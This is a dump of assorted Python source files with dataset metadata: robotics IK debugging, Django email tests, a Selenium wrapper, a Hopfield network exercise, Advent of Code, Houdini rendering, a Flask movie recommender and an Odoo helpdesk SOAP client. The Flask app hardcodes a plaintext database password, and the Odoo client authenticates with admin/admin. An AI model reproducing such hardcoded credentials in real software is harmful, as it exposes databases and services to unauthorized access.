p_j2 # vector from joint-2 to wrist-center\n d2_wc = norm3d(vec_j2_to_wc) # distance from joint 2 to wrist-center\n\n # Calculate inner angles from triangle between joint 2, joint 3 and wrist-center\n inner_j2 = acos((d2_3**2 + d2_wc**2 - d3_wc**2)/(2*d2_3*d2_wc))\n inner_j3 = acos((d2_3**2 + d3_wc**2 - d2_wc**2)/(2*d2_3*d3_wc))\n\n # Having triangle inner angles, calculate needed joint angles\n angle_wc_j2 = asin(vec_j2_to_wc[2]/d2_wc) # angle between WC and the horiz-plane at j2\n theta2 = pi/2 - (inner_j2 + angle_wc_j2) # theta2 = 0 is 90 degrees with horiz-plane\n angle_offset_wc_j3 = atan2(-a3, d4)\n theta3 = pi/2 - (inner_j3 + angle_offset_wc_j3)\n\n dh_theta1 = theta1\n dh_theta2 = theta2 - pi/2\n dh_theta3 = theta3\n R0_3 = N(R0_1.subs({q1: dh_theta1}))\\\n * N(R1_2.subs({q2: dh_theta2}))\\\n * N(R2_3.subs({q3: dh_theta3}))\n\n Rrpy_dh = Rrpy_gazebo * R_dh_to_gazebo\n R0_3_inv = R0_3.transpose() # orthonormal matrix: inv() = transpose()\n R3_6 = R0_3_inv * Rrpy_dh[0:3, 0:3]\n theta5 = N(atan2(sqrt(R3_6[0, 2]**2 + R3_6[2, 2]**2), R3_6[1, 2]))\n theta4 = atan2(R3_6[2,2], -R3_6[0,2])\n theta6 = atan2(-R3_6[1,1],R3_6[1,0])\n dh_theta4 = theta4\n dh_theta5 = theta5\n dh_theta6 = theta6\n\n ## \n ########################################################################################\n \n ########################################################################################\n ## For additional debugging add your forward kinematics here. 
Use your previously calculated thetas\n    ## as the input and output the position of your end effector as your_ee = [x,y,z]\n\n    ## (OPTIONAL) YOUR CODE HERE!\n\n    ## End your code input for forward kinematics here!\n    ########################################################################################\n\n    ## For error analysis please set the following variables of your WC location and EE location in the format of [x,y,z]\n    your_ee = N(T0_1.subs({q1: dh_theta1}))\\\n            * N(T1_2.subs({q2: dh_theta2}))\\\n            * N(T2_3.subs({q3: dh_theta3}))\\\n            * N(T3_4.subs({q4: dh_theta4}))\\\n            * N(T4_5.subs({q5: dh_theta5}))\\\n            * N(T5_6.subs({q6: dh_theta6}))\\\n            * N(T6_7.subs({q7: 0}))\\\n            * Matrix([0, 0, 0, 1])\n    your_wc = [p_wc[0],p_wc[1],p_wc[2]] # <--- Load your calculated WC values in this array\n    ########################################################################################\n\n    ## Error analysis\n    print (\"\\nTotal run time to calculate joint angles from pose is %04.4f seconds\" % (time()-start_time))\n\n    # Find WC error\n    if not(sum(your_wc)==3):\n        wc_x_e = abs(your_wc[0]-test_case[1][0])\n        wc_y_e = abs(your_wc[1]-test_case[1][1])\n        wc_z_e = abs(your_wc[2]-test_case[1][2])\n        wc_offset = sqrt(wc_x_e**2 + wc_y_e**2 + wc_z_e**2)\n        print (\"\\nWrist error for x position is: %04.8f\" % wc_x_e)\n        print (\"Wrist error for y position is: %04.8f\" % wc_y_e)\n        print (\"Wrist error for z position is: %04.8f\" % wc_z_e)\n        print (\"Overall wrist offset is: %04.8f units\" % wc_offset)\n\n    # Find theta errors\n    t_1_e = abs(theta1-test_case[2][0])\n    t_2_e = abs(theta2-test_case[2][1])\n    t_3_e = abs(theta3-test_case[2][2])\n    t_4_e = abs(theta4-test_case[2][3])\n    t_5_e = abs(theta5-test_case[2][4])\n    t_6_e = abs(theta6-test_case[2][5])\n    print (\"\\nTheta 1 error is: %04.8f\" % t_1_e)\n    print (\"Theta 2 error is: %04.8f\" % t_2_e)\n    print (\"Theta 3 error is: %04.8f\" % t_3_e)\n    print (\"Theta 4 error is: %04.8f\" % t_4_e)\n    print (\"Theta 5 error is: %04.8f\" % t_5_e)\n    print (\"Theta 6 error is: %04.8f\" % t_6_e)\n    print (\"\\n**These theta errors may not be a correct representation of your code, due to the fact \\\n                           \\nthat the arm can have multiple positions. 
It is best to add your forward kinematics to \\\n                           \\nconfirm whether your code is working or not**\")\n    print (\" \")\n\n    # Find FK EE error\n    if not(sum(your_ee)==3):\n        ee_x_e = abs(your_ee[0]-test_case[0][0][0])\n        ee_y_e = abs(your_ee[1]-test_case[0][0][1])\n        ee_z_e = abs(your_ee[2]-test_case[0][0][2])\n        ee_offset = sqrt(ee_x_e**2 + ee_y_e**2 + ee_z_e**2)\n        print (\"\\nEnd effector error for x position is: %04.8f\" % ee_x_e)\n        print (\"End effector error for y position is: %04.8f\" % ee_y_e)\n        print (\"End effector error for z position is: %04.8f\" % ee_z_e)\n        print (\"Overall end effector offset is: %04.8f units \\n\" % ee_offset)\n\n\n\n\nif __name__ == \"__main__\":\n    # Change test case number for different scenarios\n    test_case_number = 1\n\n    test_code(test_cases[test_case_number])\n","sub_path":"IK_debug.py","file_name":"IK_debug.py","file_ext":"py","file_size_in_byte":11857,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"74589136","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nimport base64\nfrom datetime import datetime, timedelta\nfrom email.mime.text import MIMEText\nimport os\n\nfrom django.contrib.auth.models import User\nfrom django.core import mail\nfrom django.test import TestCase\nfrom mock import mock\n\nfrom emailengine.base_email import BaseEmail, EmailSent\n\n\nclass TestEmail(BaseEmail):\n    \"\"\"\n    Email class for testing purposes\n    \"\"\"\n\n    email_type = 'please respond'\n    subject = 'subject line'\n    base_template_dir = 'emailengine/'\n    body_template = 'base.html'\n    html_template = 'base.html'\n\n\nclass BaseEmailTestCase(TestCase):\n    \"\"\"\n    Verify BaseEmail is saving, sending etc\n    \"\"\"\n\n    def setUp(self):\n        self.user = User.objects.create(\n            username='jdoe',\n            email='jdoe@email.com'\n        )\n\n        EmailSent.objects.create(\n            user_id=self.user.id,\n            email_type='please respond',\n            sent_datetime=datetime.today() - timedelta(days=2)\n        )\n\n    def attach_file(self, filenames):\n        \"\"\"\n        Helper function for attaching files\n        \"\"\"\n        attachments = []\n        MY_DIR = os.path.join(os.path.dirname(__file__), 'testdata')\n\n        for filename in filenames:\n            filename = os.path.join(MY_DIR, filename)\n            content = open(filename).read()\n            # 'plain' is the MIME subtype; passing 'text/plain' here would\n            # produce a bogus \"text/text/plain\" content type\n            attachment = MIMEText(content, 'plain', 'utf-8')\n            attachments.append(attachment)\n\n        return attachments\n\n    def test_send_daily_email(self):\n        \"\"\"\n        Verify max_frequency limits the frequency of emails sent\n        \"\"\"\n        class DailyEmail(TestEmail):\n            max_frequency = timedelta(days=2)\n\n        email_instance = DailyEmail()\n        # send initial email\n        email_instance.send_to_email(\n            'email@usersemail.com',\n            email_from='fake_sender@fake.com',\n        )\n        self.assertIn('email@usersemail.com', mail.outbox[0].to[0])\n\n        # simulate day passing, test email will not send during max_frequency\n        yesterday = datetime.now() - timedelta(days=1)\n        EmailSent.objects.update(sent_datetime=yesterday)\n\n        email_instance2 = DailyEmail()\n        was_sent2 = email_instance2.send_to_email(\n            'email@usersemail.com',\n            email_from='fake_sender2@fake.com',\n        )\n        self.assertFalse(was_sent2)\n\n        # test send_to_user will not send during max frequency\n        email_instance3 = DailyEmail()\n        was_sent3 = email_instance3.send_to_user(\n            self.user,\n            email_from='fake_sender2@fake.com',\n        )\n        self.assertFalse(was_sent3)\n\n        # simulate days passing, test email sends again outside max_frequency\n        dt_5_days_ago = datetime.now() - timedelta(days=5)\n        EmailSent.objects.update(sent_datetime=dt_5_days_ago)\n\n        email_instance4 = 
DailyEmail()\n was_sent4 = email_instance4.send_to_email(\n 'email@usersemail.com',\n email_from='fake_sender2@fake.com',\n )\n self.assertTrue(was_sent4)\n\n def test_email_count_limit(self):\n \"\"\"\n Verify max_send_cnt limits the number of emails sent\n \"\"\"\n class OneSendEmail(TestEmail):\n max_send_cnt = 1\n\n email_instance = OneSendEmail()\n email_instance.send_to_email(\n 'email@usersemail.com',\n email_from='fake_sender@fake.com',\n )\n self.assertIn('email@usersemail.com', mail.outbox[0].to[0])\n\n email_instance2 = OneSendEmail()\n was_sent2 = email_instance2.send_to_email(\n 'email@usersemail.com',\n email_from='fake_sender2@fake.com',\n )\n self.assertFalse(was_sent2)\n\n # test email does not send when using send_to_user and max_send_cnt\n email_instance3 = OneSendEmail()\n was_sent3 = email_instance3.send_to_user(\n self.user,\n email_from='fake_sender2@fake.com',\n )\n self.assertFalse(was_sent3)\n\n def test_email_from_name(self):\n \"\"\"\n Verify email_from_name is used/sent for email\n \"\"\"\n class EmailWithFromName(TestEmail):\n email_from_name = 'email_sender_name'\n\n email_instance = EmailWithFromName()\n was_sent = email_instance.send_to_user(\n self.user,\n email_from='fake_sender@fake.com',\n email_from_name='Bob',\n )\n self.assertTrue(was_sent)\n self.assertIn('Bob', mail.outbox[0].from_email)\n\n def test_send_with_cc(self):\n \"\"\"\n Test cc emails are included in send\n \"\"\"\n email_instance = TestEmail()\n email_instance.send_to_email(\n 'fake_sender@fake.com',\n cc_emails='email@cc.com',\n )\n self.assertIn('email@cc.com', mail.outbox[0].cc)\n\n def test_litmus_tracking_code(self):\n \"\"\"\n Verify litmus tracking code is added to context\n \"\"\"\n class EmailLitmusTracking(TestEmail):\n litmus_tracking_code = 1234\n\n email_instance = EmailLitmusTracking()\n email_instance.send_to_email('fake_sender@fake.com')\n self.assertIn('1234', mail.outbox[0].body)\n\n def test_attachments(self):\n \"\"\"\n Verify attachments passed in are actually attached to email\n \"\"\"\n email_instance = TestEmail()\n filenames = ['test_attachment.txt']\n attachments = self.attach_file(filenames)\n\n email_instance.send_smtp(\n context={'body': 'testbody'},\n email_from_string='fake@fakemail.com',\n email_to='fake_sender@fake.com',\n subject='subject line',\n attachments=attachments\n )\n\n self.assertEqual(len(mail.outbox), 1)\n self.assertIn(\n 'Content-Type',\n mail.outbox[0].attachments[0]._headers[0]\n )\n # check content of attachment\n self.assertIn(\n b'This file is for testing attachments.',\n base64.b64decode(mail.outbox[0].attachments[0].get_payload())\n )\n\n def test_record_send_no_email_type(self):\n \"\"\"\n Verify record_send returns None if there is no email_type\n \"\"\"\n class NoEmailType(TestEmail):\n email_type = None\n\n email_instance = NoEmailType()\n\n email_count = EmailSent.objects.count()\n value = email_instance.record_send(None, 'fake@fakemail.com')\n\n # check that email object count remains same, from setUp\n self.assertEqual(EmailSent.objects.count(), email_count)\n self.assertIsNone(value)\n\n @mock.patch('emailengine.base_email.BaseEmail.check_unsubscribed')\n def test_check_unsubscribed_true(self, mock_unsubscribed):\n \"\"\"\n Verify user does not receive email if unsubscribing\n \"\"\"\n email_instance = TestEmail()\n mock_unsubscribed.return_value = True\n\n was_sent = email_instance.send_to_email(\n 'fake@fakemail.com',\n email_from='fake_sender@fake.com',\n )\n self.assertFalse(was_sent)\n\n def 
test_unsubscribed_method(self):\n \"\"\"\n Verify check_unsubscribed returns False if ignore_subscription is true\n \"\"\"\n class IgnoreSubscription(TestEmail):\n ignore_subscription = True\n\n email_instance = IgnoreSubscription()\n self.assertFalse(email_instance.check_unsubscribed('mail@gm.com'))\n\n def test_get_context_data(self):\n \"\"\"\n Verify urls are added to context\n \"\"\"\n class UnsubscribeEmail(TestEmail):\n def unsubscribe_url(self, email):\n return 'test_url'\n\n email_instance = UnsubscribeEmail()\n context = email_instance.get_context_data(\n send_to_user=None,\n send_to_email='fake@fakemail.com'\n )\n self.assertDictContainsSubset(\n {'unsubscribe_url': 'test_url'},\n context\n )\n","sub_path":"emailengine/tests/test_base_email.py","file_name":"test_base_email.py","file_ext":"py","file_size_in_byte":7946,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"507718882","text":"from selenium.webdriver import Remote, DesiredCapabilities\nfrom webdriver_manager.manager import DriverManager\nfrom selenium.webdriver.firefox.firefox_profile import FirefoxProfile\nfrom selenium.webdriver.chrome.options import Options\n\n\nclass AbstractBrowser(object):\n def __init__(self,\n name,\n webdriver_class=None,\n webdriver_manager: DriverManager = None,\n desired_capabilities: DesiredCapabilities = None,\n firefox_profile: FirefoxProfile = None,\n chrome_options: Options = None,\n command_executor=None\n ):\n self.name = name\n self.chrome_options = chrome_options\n self.firefox_profile = firefox_profile\n self.command_executor = command_executor\n self.desired_capabilities = desired_capabilities\n self.webdriver_manager = webdriver_manager\n self.__web_driver = Remote(command_executor=command_executor,\n desired_capabilities=desired_capabilities,\n browser_profile=firefox_profile,\n keep_alive=True) if command_executor and not webdriver_manager \\\n else self.get_webdriver(webdriver_class=webdriver_class,\n webdriver_manager=webdriver_manager,\n desired_capabilities=desired_capabilities,\n firefox_profile=firefox_profile,\n chrome_options=chrome_options)\n\n def get_webdriver(self,\n webdriver_class,\n webdriver_manager: DriverManager,\n desired_capabilities: DesiredCapabilities = None,\n firefox_profile: FirefoxProfile = None,\n chrome_options: Options = None) -> Remote:\n call_options = {\"executable_path\": webdriver_manager.install()} if webdriver_manager else dict()\n if desired_capabilities:\n call_options[\"desired_capabilities\"] = desired_capabilities\n\n if firefox_profile:\n call_options[\"firefox_profile\"] = firefox_profile\n\n if chrome_options:\n call_options[\"options\"] = chrome_options\n\n return webdriver_class(**call_options)\n\n @property\n def web_driver(self):\n return self.__web_driver\n","sub_path":"browsers/abstract_browser.py","file_name":"abstract_browser.py","file_ext":"py","file_size_in_byte":2417,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"482347084","text":"import itertools as it\nimport random\n\nimport numpy as np\n\n# To find an energy minimum in this\n# net, start from a random state and\n# then update units one at a time in\n# random order.\n# – Update each unit to whichever\n# of its two states gives the\n# lowest global energy.\nn = 5\nV = list(it.product([0, 1], repeat=n))\ninit_V = random.randint(0, len(V))\nW = np.zeros((n, n), dtype=int)\nW[0][2] = W[1][2] = 1\nW[2][4] = W[2][3] = 2\nW[1][4] = -3\nW[0][3] = -2\nW[3][4] = 3\n\nW 
= W + W.T\nminus_energy = np.zeros((len(V), 1))\nnodes_nums = [x for x in range(n)]\nrandom.shuffle(nodes_nums)\nprint(nodes_nums)\nE=[]\nfor S in V:\n    E1 = 0\n    x = np.array(S)\n    for num in nodes_nums:\n        E1 = -1 * (np.dot(np.dot(x, W), x.T) / 2)\n        # copy() is required: plain assignment would alias x, so flipping\n        # x2[num] would silently corrupt the current state as well\n        x2 = x.copy()\n        # flip the unit *before* measuring the candidate energy; the\n        # original computed E2 first, so E2 always equalled E1\n        if x2[num] == 0:\n            x2[num] = 1\n        else:\n            x2[num] = 0\n        E2 = -1 * (np.dot(np.dot(x2, W), x2.T) / 2)\n        if E2 < E1:\n            x = x2\n            E.append(E2)\n        else:\n            E.append(E1)\nres = list(set(E))\nres.sort()\nprint(res)\n","sub_path":"hopfield_assighment.py","file_name":"hopfield_assighment.py","file_ext":"py","file_size_in_byte":1021,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"117851105","text":"# https://adventofcode.com/2020/day/8\n\nfrom enum import Enum\n\nimport pytest\n\n\nclass Op(Enum):\n    acc = 1\n    jmp = 2\n    nop = 3\n\ndef read_program(fname):\n    program = []\n    with open(fname) as f:\n        for line in f:\n            op, num = line.split()\n            program.append((Op.__members__[op], int(num)))\n    return program\n\nclass Cpu:\n    def __init__(self, program, tweaks=None):\n        self.program = program\n        self.tweaks = tweaks or {}\n        self.ip = 0\n        self.acc = 0\n        self.ips_executed = set()\n\n    def step(self):\n        op, num = self.tweaks.get(self.ip, self.program[self.ip])\n        self.ips_executed.add(self.ip)\n        if op == Op.acc:\n            self.acc += num\n        elif op == Op.jmp:\n            self.ip += num - 1\n        elif op == Op.nop:\n            pass\n        self.ip += 1\n\n    def about_to_repeat(self):\n        return self.ip in self.ips_executed\n\n    def part1(self):\n        while not self.about_to_repeat():\n            self.step()\n        return self.acc\n\n    def done(self):\n        return self.ip == len(self.program)\n\n    def part2(self):\n        while True:\n            if self.about_to_repeat():\n                return None\n            if self.done():\n                return self.acc\n            self.step()\n\n\ndef test_part1():\n    cpu = Cpu(read_program(\"day08_test.txt\"))\n    assert cpu.part1() == 5\n\nif __name__ == \"__main__\":\n    cpu = Cpu(read_program(\"day08_input.txt\"))\n    acc = cpu.part1()\n    print(f\"Part 1: Immediately before any instruction is executed a second time, {acc} is in the accumulator.\")\n\ndef part2(fname):\n    program = read_program(fname)\n    for i, (op, num) in enumerate(program):\n        if op == Op.jmp:\n            tweaks = {i: (Op.nop, num)}\n        elif op == Op.nop:\n            tweaks = {i: (Op.jmp, num)}\n        elif op == Op.acc:\n            continue\n        cpu = Cpu(program, tweaks)\n        acc = cpu.part2()\n        if acc is not None:\n            return acc\n\ndef test_part2():\n    assert part2(\"day08_test.txt\") == 8\n\nif __name__ == \"__main__\":\n    acc = part2(\"day08_input.txt\")\n    print(f\"Part 2: {acc} is in the accumulator.\")\n","sub_path":"day08.py","file_name":"day08.py","file_ext":"py","file_size_in_byte":2149,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
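A quick sanity check for the Cpu interpreter above, using the nine-instruction sample program from the Advent of Code day 8 puzzle statement, inlined so no day08_test.txt file is needed:

sample = [(Op.nop, 0), (Op.acc, 1), (Op.jmp, 4), (Op.acc, 3), (Op.jmp, -3),
          (Op.acc, -99), (Op.acc, 1), (Op.jmp, -4), (Op.acc, 6)]
assert Cpu(sample).part1() == 5                                 # loops after accumulating 5
assert Cpu(sample, tweaks={7: (Op.nop, -4)}).part2() == 8       # patched program halts with 8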
node.evalParm(\"doppath\")\n\t\t\tbreak\n\t\texcept:None\n\t#-----------------------------------------\n\n\tnode_output = rop_output.evalParm(\"sopoutput\")\n\n\tdirname=os.path.dirname(node_output)\n\tbasename_full=os.path.basename(node_output)\n\tpadding=re.findall('\\d+', basename_full)[-1]\n\tbasename=basename_full.split(padding)[0]\n\n\tini=dirname+\"/initialstate\"\n\tif not os.path.isdir(ini):\n\t\tos.mkdir(ini)\n\t\n\t# chekea si el .sim anterior existe\n\tinit_frame=ini+\"/\"+basename+str(first_frame-1)+\".sim\"\n\tif not os.path.isfile(init_frame):\n\t\tinit_frame=None\n\t#-----------------------------------------\n\tif not first_frame==1:\n\t\thou.node(dop_path).parm(\"startframe\").set(first_frame-1)\n\tif init_frame:\n\t\thou.node(dop_path).parm(\"initialstate\").set(init_frame)\n\n\tif init_frame or first_frame==1:\n\n\t\trop_output.render(frame_range=(first_frame,last_frame), verbose=True)\n\n\t\tdop_output = hou.node('/out').createNode('dop')\n\t\tdop_output.parm(\"doppath\").set(dop_path)\n\t\tsim_file=ini+\"/\"+basename+str(last_frame)+\".sim\"\n\t\tdop_output.parm(\"dopoutput\").set(sim_file)\n\n\t\tdop_output.render(frame_range=(last_frame,last_frame), verbose=False)\n\n\telse:print(\"\\nNo simulation starting point was found.\\n\")\n\nelse:\n\thou.node(out_node).render(frame_range=(first_frame,last_frame), verbose=True)\n\n","sub_path":"modules/houdiniCatsFarm.py","file_name":"houdiniCatsFarm.py","file_ext":"py","file_size_in_byte":1901,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"208213300","text":"from flask import Flask, request, render_template, jsonify\nimport pandas as pd\nimport numpy as np\nfrom sklearn.metrics.pairwise import cosine_similarity\nimport pymysql\n\napp = Flask(__name__)\n\n\ndef movieExists(movie_name, df):\n if movie_name in df.index:\n return True\n else:\n return False\n\n\ndef find_similar_movie(movie_name, df):\n if movieExists(movie_name, df):\n a_1 = np.array(df.loc[movie_name]).reshape(1, -1)\n score_1 = cosine_similarity(df, a_1).reshape(-1)\n dictDf = {'content': score_1}\n similar = pd.DataFrame(dictDf, index=df.index)\n similar.sort_values('content', ascending=False, inplace=True)\n similar_list = similar.index.tolist()[1:11]\n return similar_list\n else:\n raise ValueError('ERROR: The Movie is not Recognised')\n\n\n@app.route('/contributors')\ndef get_contributors():\n return jsonify({\n \"Contributors\": [\n \"Linjing Fu\",\n \"Ekaterina Krivtsova\",\n \"Piotr Biskupski\",\n \"Thomas Irmer\"\n ]\n })\n\n\n@ app.route('/')\ndef my_form():\n return render_template(\"home.html\")\n\n\n@ app.route('/handleDataExistingUser', methods=['POST'])\ndef handleDataExistingUser():\n mydb = pymysql.connect(user='testuser', passwd='Password123!', host='mysql', database='sampledb')\n mycursor = mydb.cursor()\n\n firstname = request.form['firstnameval']\n lastname = request.form['lastnameval']\n\n fullname = firstname+' '+lastname\n fullname = fullname.title()\n\n modelval = \"1\"\n\n mycursor.execute(\"SELECT * FROM sampledb.movie_predictions WHERE name=%s\", (fullname,))\n\n myresult = mycursor.fetchall()\n\n res_name = 'no user exists by that name'\n if not myresult:\n res_name = 'no user exists by that name'\n\n print(\"We are using Model: \" + modelval)\n return render_template(\"home.html\", error_message=\"ERROR: User is not recognized\")\n else:\n res_name = fullname\n movies = myresult[0]\n print(\"We are using Model: \" + modelval)\n return render_template(\"results.html\", 
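In the Houdini record above, padding=re.findall('\d+', basename_full)[-1] takes the last run of digits in the output file name as the frame number, and basename is everything before it. A tiny standalone illustration of that parsing (the file names here are made up):

import re

for name in ("sim.0042.sim", "flip_v2.0100.bgeo.sc"):
    digits = re.findall(r"\d+", name)[-1]  # last digit run, e.g. "0042"
    base = name.split(digits)[0]           # prefix before the frame number
    print(base, digits, "padding width:", len(digits))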
fullname=res_name,\n movie_rec_1=movies[2], movie_rec_2=movies[3], movie_rec_3=movies[4], movie_rec_4=movies[5], movie_rec_5=movies[6],\n movie_rec_6=movies[7], movie_rec_7=movies[8], movie_rec_8=movies[9], movie_rec_9=movies[10], movie_rec_10=movies[11])\n\n\n@ app.route('/handleDataNewUser', methods=['POST'])\ndef handleDataNewUser():\n res_name = 'ERROR'\n try:\n latent_matrix_1_mvp = pd.read_csv('app_csvs/movie-similarity-matrix.csv', index_col=0)\n\n firstname = request.form['firstnameval']\n lastname = request.form['lastnameval']\n movie = request.form['movieval']\n\n res_name = firstname+' '+lastname\n res_name = res_name.title()\n\n modelval = \"2\"\n\n movies = find_similar_movie(movie, latent_matrix_1_mvp)\n\n print(\"We are using Model: \" + modelval)\n return render_template(\"results.html\", fullname=res_name,\n movie_rec_1=movies[0], movie_rec_2=movies[1], movie_rec_3=movies[2], movie_rec_4=movies[3], movie_rec_5=movies[4],\n movie_rec_6=movies[5], movie_rec_7=movies[6], movie_rec_8=movies[7], movie_rec_9=movies[8], movie_rec_10=movies[9])\n\n except Exception as error:\n print(\"We are using Model: \"+modelval)\n print(str(error))\n return render_template(\"home.html\", error_message=str(error))\n\n\n@ app.route('/new/user', methods=['POST'])\ndef newuser():\n try:\n mydb = pymysql.connect(user='testuser', passwd='Password123!', host='mysql', database='sampledb')\n mycursor = mydb.cursor()\n\n sql = \"INSERT INTO movie_predictions (name,userId,rec_1,rec_2,rec_3,rec_4,rec_5,rec_6,rec_7,rec_8,rec_9,rec_10,oldrank_1,oldrank_2,oldrank_3) VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s)\"\n\n args = (request.json['name'], request.json['userid'], request.json['movie_rec_1'], request.json['movie_rec_2'],\n request.json['movie_rec_3'], request.json['movie_rec_4'], request.json['movie_rec_5'],\n request.json['movie_rec_6'], request.json['movie_rec_7'], request.json['movie_rec_8'],\n request.json['movie_rec_9'], request.json['movie_rec_10'], request.json['old_movie_1'],\n request.json['old_movie_2'], request.json['old_movie_3'])\n\n mycursor.execute(sql, args)\n\n mydb.commit()\n\n return jsonify({'result': \"New user added successfully\"})\n\n except Exception as error:\n return jsonify({\"ERROR\": \"There was an error while adding new user\", \"ERROR MESSAGE\": str(error)})\n\n\nif __name__ == '__main__':\n app.run(host=\"0.0.0.0\")\n","sub_path":"app/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":4743,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"223494007","text":"# -*- coding: utf-8 -*-\n\nimport requests\nimport logging\nimport base64\nfrom datetime import date, timedelta\nfrom dateutil.relativedelta import relativedelta\nfrom requests.exceptions import ConnectionError as ReqConnectionError, HTTPError, InvalidSchema, InvalidURL, ReadTimeout\nfrom zeep.wsse.username import UsernameToken\nfrom zeep import Client, Settings\nfrom zeep.exceptions import Fault\nfrom zeep.transports import Transport\nfrom zeep import helpers\n\nfrom lxml import etree\nfrom lxml import objectify\n\nfrom bs4 import BeautifulSoup\n\nfrom odoo import models, fields, api, _\n\n_logger = logging.getLogger(__name__)\n\ncredentials = {\n 'fault_ns': 's',\n 'wsdl': 'https://www.porschecl.cl/usuarios/aestadoodoo.aspx?wsdl',\n 'token': UsernameToken('admin', 'admin'),\n}\n\n\nclass HelpdeskTicket(models.Model):\n _inherit = 'helpdesk.ticket'\n\n ticket_state_wsdl = fields.Selection(string='Estado Respuesta WSDL',\n 
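find_similar_movie in the Flask record above reshapes one movie's latent vector to a single-row matrix, scores it against every row with cosine_similarity, and returns the best matches after dropping the movie itself. The same pattern on a toy matrix (titles and values are invented):

import pandas as pd
from sklearn.metrics.pairwise import cosine_similarity

df = pd.DataFrame([[1.0, 0.0], [0.9, 0.1], [0.0, 1.0]],
                  index=["Movie A", "Movie B", "Movie C"])
query = df.loc["Movie A"].to_numpy().reshape(1, -1)
scores = cosine_similarity(df, query).reshape(-1)
ranked = pd.Series(scores, index=df.index).sort_values(ascending=False)
print(ranked.index[1:].tolist())  # neighbours, the query itself excluded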
selection=[('0', 'No enviado'), ('1', 'WSDL Respuesta 1'),\n                                                     ('2', 'WSDL Respuesta 2')],\n                                         default='0')\n\n    @api.model\n    def _l10n_pe_edi_get_general_error_messages(self):\n        return {\n            'L10NPE07': _(\n                \"Trying to send the invoice to the UserCore the webservice returned a controlled error, please \"\n                \"try again later, the error is on their side not here.\"),\n            'L10NPE08': _(\"Check your firewall parameters, it is not being possible to connect with server to sign \"\n                          \"invoices.\"),\n            'L10NPE10': _(\"The URL provided to connect to the UserCore is wrong, please check your implementation.\"),\n            'L10NPE11': _(\"The XML generated is not valid.\"),\n            'L10NPE12': _(\"The XML generated is not valid.\"),\n\n        }\n\n    def write(self, vals):\n        res = super(HelpdeskTicket, self).write(vals)\n\n        if 'stage_id' in vals:\n            stages = [\n                self.env.ref('helpdesk.stage_solved').id, self.env.ref('helpdesk.stage_cancelled').id\n            ]\n\n            if self.stage_id.id in stages:\n                print(self.stage_id.name, 'Stage')\n\n                last_message = self.message_ids.filtered(lambda r: r.message_type == 'comment')\n\n                if not last_message:\n                    last_message = self.message_ids\n\n                write_date = self.close_date + timedelta(hours=-4)\n\n                data = {\n                    'Sdtticketestado': {\n                        'idTicket': self.id,\n                        'idTicket_usercore': self.numticket_UserCore,\n                        'Estado': self.stage_id.name,\n                        'RespuestaTecnico': last_message[0].body,\n                        'fecha': date.strftime(self.write_date, '%Y-%m-%d'),\n                        'hora': '{}:{}:{}'.format(write_date.hour, write_date.minute, write_date.second),\n                        'rut_usercore_tecnico': self.user_id.vat,\n                        'RespCode': ''\n                    }\n                }\n\n                _logger.info(f\"POST WSDL Ticket State ===>>> {data}\")\n\n                transport = Transport(operation_timeout=15, timeout=15)\n                result = None\n\n                try:\n                    settings = Settings(raw_response=True)\n                    client = Client(\n                        wsdl=credentials['wsdl'],\n                        wsse=credentials['token'],\n                        settings=settings,\n                        transport=transport,\n                    )\n                    result = client.service.Execute(**data)\n                    result.raise_for_status()\n\n                except Exception as e:\n                    _logger.error(e)\n\n                _logger.info(result)\n                if result is not None and not result:  # a falsy Response means an HTTP error status; result stays None when the call failed\n                    _logger.info(result.content)\n\n                if result is not None and result.status_code == 200:\n                    soap_xml = result.content\n                    resp_code = BeautifulSoup(soap_xml, 'xml').find('SOAP-ENV:Body').find('RespCode')\n                    _logger.info(f\"RespCode: {resp_code.contents[0]}\")\n                    self.ticket_state_wsdl = resp_code.contents[0]\n\n        return res\n","sub_path":"helpdesk_wsrepticket/models/helpdesk_ticket.py","file_name":"helpdesk_ticket.py","file_ext":"py","file_size_in_byte":4253,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"219056667","text":"n1 = int(input(\"primeiro valor: \"))\r\nn2 = int(input(\"segundo valor: \"))\r\nn3 = int(input(\" terceiro valor: \"))\r\n\r\nMAIOR = n1\r\n\r\nif (n2 > MAIOR ):\r\n    MAIOR = n2\r\n\r\nif (n3 > MAIOR ):\r\n    MAIOR = n3\r\n\r\nprint (\"MAIOR: \", MAIOR)\r\n\r\nMENOR = n1\r\n\r\nif (n2 < MENOR ):\r\n    MENOR = n2\r\n\r\nif (n3 < MENOR ):\r\n    MENOR = n3\r\n\r\nprint (\"MENOR: \", MENOR)","sub_path":"ATV2-7.py","file_name":"ATV2-7.py","file_ext":"py","file_size_in_byte":342,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"612401355","text":"\n# coding: utf-8\n\n# # PROJET KAGGLE DIGIT\n\n# Importation des pacakges nécessaires\n\n# In[1]:\n\nimport pandas as pd\nimport sklearn as sk\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport os\n\nfrom sklearn import neighbors\nfrom sklearn import linear_model\nfrom sklearn.model_selection import train_test_split\n\n\n\n\n#%config 
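The three-number exercise above builds MAIOR and MENOR with chained comparisons, which is fine for practice; Python's built-ins give the same result directly:

n1, n2, n3 = 7, 2, 9
print("MAIOR: ", max(n1, n2, n3))
print("MENOR: ", min(n1, n2, n3))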
